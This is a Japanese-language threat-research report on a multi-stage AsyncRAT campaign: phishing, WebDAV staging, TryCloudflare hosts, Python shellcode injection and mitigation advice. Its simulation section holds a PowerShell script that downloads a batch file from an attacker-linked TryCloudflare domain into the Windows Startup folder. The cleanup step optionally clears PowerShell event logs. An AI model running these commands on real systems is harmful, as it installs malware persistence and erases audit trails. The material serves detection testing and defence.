SOC Prime Bias: クリティカル

14 Jan 2026 15:04 UTC

MDRが明らかにしたマルチステージのAsyncRAT攻撃チェーン

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon フォローする
MDRが明らかにしたマルチステージのAsyncRAT攻撃チェーン
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

概要

このレポートは、フィッシングメールによって開始される多段階の侵入チェーンについて説明しています。これには、二重拡張子ZIPルアーを配信し、WebDAVホストのペイロードシーケンスに移行することが含まれます。オペレーターはCloudflareの無料ティアインフラストラクチャとバンドルされたPythonコンポーネントを利用してAsyncRATを被害者のエンドポイントに展開します。実行と持続性は、Windows Script Host、PowerShell、バッチスクリプトなどのネイティブなWindowsツールに依存していますが、最終段階ではexplorer.exeへのコードインジェクションが使用されます。信頼性の高いクラウドサービスを通じて配信とステージングをルーティングすることで、活動は通常のトラフィックに溶け込み、従来の境界制御を回避できます。

調査

トレンドマイクロの調査者は、ステージド配信フローと一致するテレメトリを報告しました。これは、Dropboxからの.pdf.zipアーカイブの取得、埋め込まれた.urlショートカットの実行、svchost.exeおよびrundll32.exeに起因するその後のWebDAVインタラクションを含んでいます。このチェーンは、AsyncRATシェルコードのAPCインジェクションを担当するカスタムPythonスクリプトを実行するために使用されたPython 3.14.0埋め込みファイルを展開しました。持続性は、ユーザーのスタートアップディレクトリにバッチファイルを配置することで達成されました。アナリストはまた、インフラストラクチャをサポートする複数のTryCloudflareホストを特定し、相関させました。

緩和策

二重拡張子アーカイブや予期しないZIP添付ファイルを疑わしいものとして扱うようにユーザーを訓練し、フィッシングで配信されるクラウドリンク用のフィルタリングを強化することで、露出を減らします。承認されていないクラウドトンネリングサービスへのアクセスをブロックまたは厳密に制御し、WebDAVの異常な依存度を監視します。ユーザー書き込み可能なディレクトリからのスクリプト実行を制限し、スタートアップフォルダの使用とタスクスケジュール作成に対する制御を強化します。EPR/行動検出を優先し、スクリプト駆動の実行チェーンや、正常なプロセスをターゲットにしたコード注入技術を表面化することができるものを優先します。

対応

活動が検出された場合、エンドポイントを隔離し、チェーンに関連する疑わしいプロセス(特にsvchost.exe、rundll32.exe、およびインシデントに関連する場合のpython.exe)を停止します。持続性を削除するには、スタートアップディレクトリから悪意のあるバッチアーティファクトを削除し、ダウンロードされたPythonアーカイブおよびすべてのAsyncRATコンポーネントを根絶し、追加のステージングファイルと横方向の移動を検出するための完全な法医学調査を実行します。ネットワーク制御とブロックリストを更新して、特定されたTryCloudflareドメインおよびトリアージ中に観察された関連インフラストラクチャを含めます。

攻撃フロー

シミュレーション実行

前提条件: テレメトリー&ベースライン事前フライトチェックが合格していること。

  • 攻撃のストーリー&コマンド

    初期のPowerShellアクセスを獲得した敵は、Python実行環境をセットアップし、持続性を確立しようとしています。彼らは:

    1. 埋め込まれたPythonディストリビューションをダウンロード 直接ユーザーのローカル Temp ディレクトリを使用して Invoke‑WebRequest.
    2. 悪意のあるバッチスクリプトをダウンロード (ahke.bat) をCloudflare経由でプロキシされたドメインからユーザーのスタートアップフォルダーにダウンロードし、ログオン時に実行されるようにします。
    3. ダウンロードしたPython ZIPを実行 (省略のため詳細は省略)して、さらなるペイロードを実行します。

    これらのステップは、Sigmaルールによって一致する正確なコマンド文字列を生成し、 iwr … -OutFile … パターンを持つPowerShellスクリプトブロックログを生成します。

  • 回帰テストスクリプト

    # -------------------------------------------------
    # PowerShellによるAsyncRAT環境設定のシミュレーション
    # -------------------------------------------------
    
    # 1. ユーザーテンプフォルダにPython埋め込みZIPをダウンロード
    $pythonUrl = 'https://www.python.org/ftp/python/3.14.0/python-3.14.0-embed-amd64.zip'
    $pythonDest = "$env:USERPROFILEAppDataLocalTempp.zip"
    iwr $pythonUrl -OutFile $pythonDest
    
    # 2. 持続性のための悪意のあるバッチファイルをスタートアップにダウンロード
    $batUrl = 'https://plus-condos-thy-redeem.trycloudflare.com/ahke.bat'
    $batDest = "$env:APPDATAMicrosoftWindowsStart MenuProgramsStartupahke.bat"
    iwr $batUrl -OutFile $batDest
    
    # 3. (オプション)持続性を実証するためにバッチの実行をトリガー
    # Start-Process -FilePath $batDest -WindowStyle Hidden
    # -------------------------------------------------
  • クリーンアップコマンド

    # ダウンロードされたアーティファクトを削除
    Remove-Item -Path "$env:USERPROFILEAppDataLocalTempp.zip" -ErrorAction SilentlyContinue
    Remove-Item -Path "$env:APPDATAMicrosoftWindowsStart MenuProgramsStartupahke.bat" -ErrorAction SilentlyContinue
    
    # オプションでPowerShellスクリプトブロックログをクリア(管理者権限が必要)
    # Clear-EventLog -LogName "Microsoft-Windows-PowerShell/Operational"